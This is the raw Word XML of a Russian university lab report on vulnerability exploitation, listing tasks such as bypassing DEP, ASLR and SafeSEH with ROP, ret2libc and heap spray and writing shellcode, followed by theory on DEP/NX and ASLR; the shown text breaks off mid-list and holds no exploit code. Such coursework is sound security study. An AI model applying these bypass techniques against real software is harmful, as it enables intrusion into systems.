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E146" w14:textId="77777777" w:rsidR="00601F8B" w:rsidRDefault="00C93DCC" w:rsidP="00C61237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00D740EB">
        <w:t>Цель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E8CC4A" w14:textId="1F37127B" w:rsidR="00E0267F" w:rsidRPr="00F038DE" w:rsidRDefault="00F038DE" w:rsidP="0015404F">
      <w:r>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidR="00947935">
        <w:t>зучение способов эксплуатации уязвимостей и механизмов противодействия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E532DC6" w14:textId="77777777" w:rsidR="00A105AA" w:rsidRPr="0015404F" w:rsidRDefault="00A105AA" w:rsidP="0015404F"/>
    <w:p w14:paraId="29FFC9BC" w14:textId="5DE8F75E" w:rsidR="00C61237" w:rsidRDefault="00C61237" w:rsidP="003A6509">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Задачи работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E5380B" w14:textId="52593767" w:rsidR="00F63D4E" w:rsidRPr="008167BD" w:rsidRDefault="008167BD" w:rsidP="008167BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>В рамках лабораторной работы необходимо осуществить эксплуатацию уязвимости, найденной в исполняемом файле в лабораторной работе №</w:t>
      </w:r>
      <w:r w:rsidR="007F7F9D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Необходимо реализовать полезную нагрузку в соответствии с указанным вариантом задания, которая будет выполняться в результате эксплуатации уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EE8131" w14:textId="726CD83E" w:rsidR="00F038DE" w:rsidRPr="00F038DE" w:rsidRDefault="00401C06" w:rsidP="00401C06">
      <w:r>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="00F038DE" w:rsidRPr="00F038DE">
        <w:t xml:space="preserve"> ходе выполнения лабораторной работы необходимо выполнить следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486C1AE2" w14:textId="77777777" w:rsidR="00401C06" w:rsidRDefault="00401C06" w:rsidP="00401C06">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Изучить защитные механизмы, затрудняющие эксплуатацию уязвимостей (DEP, ASLR, GS, Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, SMEP, SAFESEH, SEHOP и другие).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650200C" w14:textId="77777777" w:rsidR="00401C06" w:rsidRDefault="00401C06" w:rsidP="00401C06">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Изучить техники эксплуатации уязвимостей и способы обхода защитных механизмов (ret2libc, ROP,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Pivoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Heap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Spray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  и</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> другие).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA654A" w14:textId="77777777" w:rsidR="00401C06" w:rsidRDefault="00401C06" w:rsidP="00401C06">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Используя скрипт mona.py для отладчиков </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Immunity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>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>WinDBG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  или</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> другой с аналогичной функциональностью осуществить получение списка загруженных в процесс модулей, не использующих технологию рандомизации адресов. Реализовать скрипт для отладчика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3CCEAF" w14:textId="77777777" w:rsidR="00401C06" w:rsidRDefault="00401C06" w:rsidP="00401C06">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Найти в динамических библиотеках без рандомизации адресов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>опкоды</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> инструкций, необходимых для передачи управления (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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">,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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, …) на полезную нагрузку. Реализовать для этих целей скрипт для отладчика (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Immunity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>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinDBG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/IDA Pro).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D1BA5B" w14:textId="77777777" w:rsidR="00401C06" w:rsidRDefault="00401C06" w:rsidP="00401C06">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t>Провести эксплуатацию найденной уязвимости, с использованием полезной нагрузки (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) в соответствии с выданным вариантом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE2E5BA" w14:textId="7BF7255C" w:rsidR="00B878D9" w:rsidRDefault="00401C06" w:rsidP="00401C06">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эксплуатацию уязвимости осуществлять под ОС семейства Windows версии не ниже Windows 7 x64. При эксплуатации запрещено изменение исполняемого файла, запуск сторонних исполняемых файлов, либо выполнение </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">консольных команд. Полезная нагрузка должна быть написана на языке ассемблера, либо на языке C с использованием приемом разработки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>базонезависимого</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F9E901" w14:textId="77777777" w:rsidR="00F63D4E" w:rsidRPr="00401C06" w:rsidRDefault="00F63D4E" w:rsidP="00F63D4E"/>
    <w:p w14:paraId="5C599CD0" w14:textId="77777777" w:rsidR="00F63D4E" w:rsidRDefault="00F63D4E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14:paraId="077463AC" w14:textId="20F46F2C" w:rsidR="00897481" w:rsidRDefault="00897481" w:rsidP="003A6509">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Т</w:t>
      </w:r>
      <w:r w:rsidR="0040722F">
        <w:t>еоретические сведения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D1AE0" w14:textId="1E670FCB" w:rsidR="00897481" w:rsidRDefault="00CC429A" w:rsidP="00897481">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Защитные механизмы, затрудняющие эксплуатацию уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5EBD2A" w14:textId="42192FE0" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A394604" w14:textId="18E5C500" w:rsidR="00E67132" w:rsidRDefault="00E67132" w:rsidP="00E67132">
      <w:r w:rsidRPr="00E67132">
        <w:t>Предотвращение выполнения данных (DEP)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67132">
        <w:t xml:space="preserve"> это функция защиты памяти на уровне системы, встроенная в операционную систему, начиная с Windows XP и Windows Server 2003. DEP позволяет системе помечать одну или несколько страниц памяти как неисполняемые. Если область памяти помечена как неисполняемая, код не может быть выполнен из этой области</w:t>
      </w:r>
      <w:r w:rsidR="002854AE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9317B" w14:textId="6AC17473" w:rsidR="002854AE" w:rsidRDefault="002854AE" w:rsidP="00E67132">
      <w:r w:rsidRPr="002854AE">
        <w:t xml:space="preserve">DEP предотвращает запуск кода со страниц данных, таких как куча по умолчанию, стеки и пулы памяти. Если приложение пытается запустить код со страницы данных, которая защищена, возникает исключение нарушения прав доступа к памяти, </w:t>
      </w:r>
      <w:r w:rsidR="008840F1" w:rsidRPr="002854AE">
        <w:t>и,</w:t>
      </w:r>
      <w:r w:rsidRPr="002854AE">
        <w:t xml:space="preserve"> если исключение не обрабатывается, вызывающий процесс завершается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE132AA" w14:textId="33C00FC9" w:rsidR="00DD64B7" w:rsidRDefault="00DD64B7" w:rsidP="00DD64B7">
      <w:r>
        <w:t>Если приложение пытается запустить код с защищенной страницы, оно получает исключение с кодом состояния STATUS_ACCESS_VIOLATION. Если приложению необходимо запустить код со страницы памяти, оно должно выделить и установить соответствующие виртуальные атрибуты защиты памяти. При</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>выделении</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>памяти</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>она</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>должна</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>быть</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>помечена</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>как</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE </w:t>
      </w:r>
      <w:r>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD64B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAGE_EXECUTE_WRITECOPY. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Выделения памяти в куче, выполняемые с помощью функций </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>malloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HeapAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, являются неизменяемыми.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D37E1FA" w14:textId="6A2A609E" w:rsidR="00DD64B7" w:rsidRDefault="00DD64B7" w:rsidP="00DD64B7">
      <w:r>
        <w:t>Приложения не могут запускать код из кучи процесса по умолчанию или из стека.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF21DC" w14:textId="73E50364" w:rsidR="0065181A" w:rsidRDefault="00DD64B7" w:rsidP="00DD64B7">
      <w:r>
        <w:t xml:space="preserve">DEP настраивается при загрузке системы в соответствии с параметром политики защиты страниц от выполнения в данных конфигурации загрузки. Приложение может получить текущие настройки политики, вызвав функцию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetSystemDEPPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. В зависимости от настроек политики приложение может изменить настройки DEP для текущего процесса, вызвав функцию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SetProcessDEPPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EA3098" w14:textId="3F17BB85" w:rsidR="006176B4" w:rsidRPr="006176B4" w:rsidRDefault="006176B4" w:rsidP="006176B4">
      <w:r w:rsidRPr="006176B4">
        <w:lastRenderedPageBreak/>
        <w:t> Для 32-битных систем реализована программная модель</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="006176B4">
        <w:t xml:space="preserve">, а в случае 64-битной архитектуры, DEP реализуется на уровне процессора. Причиной такой аппаратно-программной </w:t>
      </w:r>
      <w:r w:rsidR="00384DFF">
        <w:t>особенности</w:t>
      </w:r>
      <w:r w:rsidRPr="006176B4">
        <w:t xml:space="preserve"> является то, что фактически DEP привязан к биту 63 в записях виртуальных страниц PTE – Page </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006176B4">
        <w:t>Table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006176B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006176B4">
        <w:t>Entry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006176B4">
        <w:t>, а в 32-битных системах этого бита попросту нет и он эмулируется программными средствами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E56E5AD" w14:textId="75DB3EA4" w:rsidR="006176B4" w:rsidRDefault="006176B4" w:rsidP="006176B4">
      <w:r w:rsidRPr="006176B4">
        <w:t>NX-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006176B4">
        <w:t>Bit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006176B4">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006176B4">
        <w:t>no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006176B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006176B4">
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006176B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006176B4">
        <w:t>bit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006176B4">
        <w:t xml:space="preserve">) это бит запрета исполнения, добавленный в страницы памяти для реализации возможности предотвращения выполнения данных как кода. Другими словами, </w:t>
      </w:r>
      <w:r w:rsidR="00BB2C0D">
        <w:t>код невозможно выполнить</w:t>
      </w:r>
      <w:r w:rsidRPr="006176B4">
        <w:t xml:space="preserve">, обратившись к тем страницам памяти, в которых есть NX-бит. Тем самым </w:t>
      </w:r>
      <w:r w:rsidR="007A2CF6">
        <w:t xml:space="preserve">появляется возможность </w:t>
      </w:r>
      <w:r w:rsidRPr="006176B4">
        <w:t>защититься от переполнения буфера. Технология требует программной поддержки со стороны ядра операционной системы, то есть реализации DEP.</w:t>
      </w:r>
      <w:r w:rsidR="00944014" w:rsidRPr="00944014">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D490A9" w14:textId="320ABEF4" w:rsidR="00944014" w:rsidRDefault="00944014" w:rsidP="006176B4">
      <w:r>
        <w:t xml:space="preserve">Включение/Отключение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00944014">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>доступно</w:t>
      </w:r>
      <w:r w:rsidR="00C805FA">
        <w:t xml:space="preserve"> также</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00944014">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysdm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00944014">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00944014">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00944014">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>«Свойства системы») в разделе Дополнительно</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006E24A7">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00944014">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004B0556">
        <w:t>Быстродействие</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004B0556">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="004B0556" w:rsidRPr="004B0556">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004B0556">
        <w:t>Параметры</w:t>
      </w:r>
      <w:r w:rsidR="00B07037">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00B07037" w:rsidRPr="00B07037">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B07037">
        <w:t>Предотвращение выполнения данных</w:t>
      </w:r>
      <w:r w:rsidR="004B0556">
        <w:t xml:space="preserve">, как показано на </w:t>
      </w:r>
      <w:r w:rsidR="0084157C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0084157C">
        <w:instrText xml:space="preserve"> REF _Ref212400097 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="0084157C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0084157C">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="0084157C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0084157C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="004B0556">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0128DDFD" w14:textId="77777777" w:rsidR="007E68D0" w:rsidRDefault="00C805FA" w:rsidP="007E68D0">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00C805FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F9FC476" wp14:editId="22B5F498">
            <wp:extent cx="4717242" cy="3878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586" cy="38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2A6F" w14:textId="07194717" w:rsidR="00C805FA" w:rsidRDefault="007E68D0" w:rsidP="007E68D0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Ref2124000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</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve"> – Включение/Отключение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0682B005" w14:textId="77777777" w:rsidR="004B0556" w:rsidRPr="006176B4" w:rsidRDefault="004B0556" w:rsidP="006176B4"/>
    <w:p w14:paraId="7CF9E98C" w14:textId="3504DDD4" w:rsidR="00CC429A" w:rsidRDefault="00CC429A" w:rsidP="00CC429A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCAD32A" w14:textId="045C3BF1" w:rsidR="00301363" w:rsidRDefault="00301363" w:rsidP="00301363">
      <w:r>
        <w:t xml:space="preserve">Относительная простая эксплуатация переполнения буфера стала возможна в том числе и благодаря тому, что </w:t>
      </w:r>
      <w:r w:rsidR="007E6304">
        <w:t>можно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> предсказать расположение той или иной структуры данных в памяти. Технология рандомизации размещения адресного пространства ASLR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randomization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) — призвана помешать злоумышленнику легко находить нужные адреса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C2FEA8" w14:textId="77777777" w:rsidR="00301363" w:rsidRDefault="00301363" w:rsidP="00301363">
      <w:r>
        <w:t>При использовании этой технологии случайным образом изменяется расположение в адресном пространстве процесса важных структур данных, а именно образов исполняемого файла, подгружаемых библиотек, кучи и стека. В результате, если атакующему необходимо передать управление по произвольному адресу, ему нужно будет угадать, по какому именно адресу расположен стек, куча или другие структуры данных, в которые можно поместить шелл-код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551CE657" w14:textId="77777777" w:rsidR="00301363" w:rsidRDefault="00301363" w:rsidP="00301363">
      <w:r>
        <w:t>Если системные файлы начиная с Windows 7 используют ASLR по умолчанию, то для пользовательских приложений разработчикам необходимо указать определенные флаги при компиляции проекта, для поддержки данной технологии. В результате, в своём РЕ-заголовке откомпилированный файл приложения должен содержать определённые флаги. В поле "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Characteristics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" находящемуся по смещению РЕ.16h находится набор следующих основных флагов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F5159" w14:textId="77777777" w:rsidR="00602E3C" w:rsidRDefault="00301363" w:rsidP="008C6576">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Бит 0 – IMAGE_FILE_RELOCS_STRIPPED</w:t>
      </w:r>
      <w:r w:rsidR="00C85B0C">
        <w:t>: у</w:t>
      </w:r>
      <w:r>
        <w:t>станавливается в единицу, если в файле нет информации о перемещениях</w:t>
      </w:r>
      <w:r w:rsidR="00C85B0C">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C89A57" w14:textId="77777777" w:rsidR="001F1EB9" w:rsidRPr="001F1EB9" w:rsidRDefault="00301363" w:rsidP="00737CA8">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Бит</w:t>
      </w:r>
      <w:r w:rsidRPr="00602E3C">
        <w:t xml:space="preserve"> 1 – </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1EB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMAGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00602E3C">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1EB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00602E3C">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1EB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXECUTABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00602E3C">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1EB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMAGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00602E3C">
        <w:t>​</w:t>
      </w:r>
      <w:r w:rsidR="00602E3C">
        <w:t>: у</w:t>
      </w:r>
      <w:r>
        <w:t>станавливается, если файл является исполняемым, и действительно может быть запущен</w:t>
      </w:r>
      <w:r w:rsidR="001F1EB9">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B77CB37" w14:textId="77777777" w:rsidR="00305BA5" w:rsidRDefault="00301363" w:rsidP="00305BA5">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Бит</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:t xml:space="preserve"> 4 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMAGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AGGRESIVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TRIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1E51">
        <w:t>​</w:t>
      </w:r>
      <w:r w:rsidR="00BF1E51">
        <w:t>: е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сли </w:t>
      </w:r>
      <w:r w:rsidR="00BF1E51">
        <w:t>установлен</w:t>
      </w:r>
      <w:r>
        <w:t>, то ОС принудительно урежет объём памяти для этого процесса, путём разбиения его на страницы. Обычно используется для различных сервисов, которые находясь в системе постоянно пробуждаются на небольшие промежутки времени</w:t>
      </w:r>
      <w:r w:rsidR="00305BA5">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D1AA5" w14:textId="77777777" w:rsidR="004F7521" w:rsidRDefault="00301363" w:rsidP="001F6772">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Бит</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3637">
        <w:t xml:space="preserve"> 5 – </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7521">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IMAGE</w:t>
      </w:r>
